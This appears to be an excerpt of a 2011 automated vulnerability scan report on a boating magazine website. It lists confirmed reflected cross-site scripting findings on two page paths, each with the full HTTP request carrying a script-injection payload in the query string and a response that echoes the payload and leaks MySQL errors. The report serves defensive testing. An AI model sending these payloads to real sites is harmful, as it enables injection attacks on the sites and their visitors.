href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_mishaps_and_rescues&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=0&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_know_how&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=75px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_used_boat_review&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=195px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=newsshow1&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=130px&amp;img_width=0&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_seamanship_and_safety&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=0&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=home_blogs_and_columns&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=75px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php?text_block_background=1&amp;text_block_bgcolor=ffffff&amp;text_block_width=195&amp;text_block_opacity=0&amp;text_block_margin=405&amp;module_width=615&amp;module_height=270&amp;thumbnail_bar=1&amp;thumbnail_width=66&amp;thumbnail_height=44&amp;thumbnail_margin=5&amp;thumbnail_border=1&amp;thumbnail_bar_position=1&amp;image_x=0&amp;image_y=0&amp;slides_count=4&amp;tick_x=405&amp;tick_y=-22" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script> <script type="text/javascript" src="http://www.soundingsonline.com/modules/mod_news_show_gk3/scripts/engine_compressed.js"></script> <script type="text/javascript" src="http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/engine_compress.js"></script> <script type="text/javascript" src="http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&amp;animation_slide_speed=500&amp;animation_interval=9000&amp;autoanimation=1&amp;animation_slide_type=0&amp;animation_text_type=0&amp;base_bgcolor=ffffff&amp;text_block_opacity=0&amp;thumbnail_width=66&amp;thumbnail_margin=5&amp;thumbnail_border=1&amp;thumbnail_border_color=a81c21&amp;thumbnail_border_color_inactive=ffffff&amp;interface_x=-20&amp;interface_y=0&amp;clickable_slides=1"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_home c_home m_home"><!--
Type of page: frontpage<br />Section: , s_home<br />Category: , c_home<br />Menu: 1, m_home-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href=&qu..
- /features/justyesterday

/features/justyesterday CONFIRMED

http://www.soundingsonline.com/features/justyesterday?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3E..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002085)</script>

Request

GET /features/justyesterday?'"--></style></script><script>netsparker(0x002085)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002085)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002085)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/features/justyesterday" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>A Look Back Into the History of Boatbuilding | Soundings Online</title> <link href="/features/justyesterday?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/features/justyesterday?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_features c_uncategorized m_passages"><!--
Type of page: category<br />Section: 5, s_features<br />Category: 662, c_uncategorized<br />Menu: 103, m_passages-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;..
- /news/todays-top-stories

/news/todays-top-stories CONFIRMED

http://www.soundingsonline.com/news/todays-top-stories?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00206C)</script>

Request

GET /news/todays-top-stories?'"--></style></script><script>netsparker(0x00206C)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00206C)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00206C)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/news/todays-top-stories" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Top Boating and Marine Industry Stories</title> <link href="/news/todays-top-stories?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/news/todays-top-stories?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
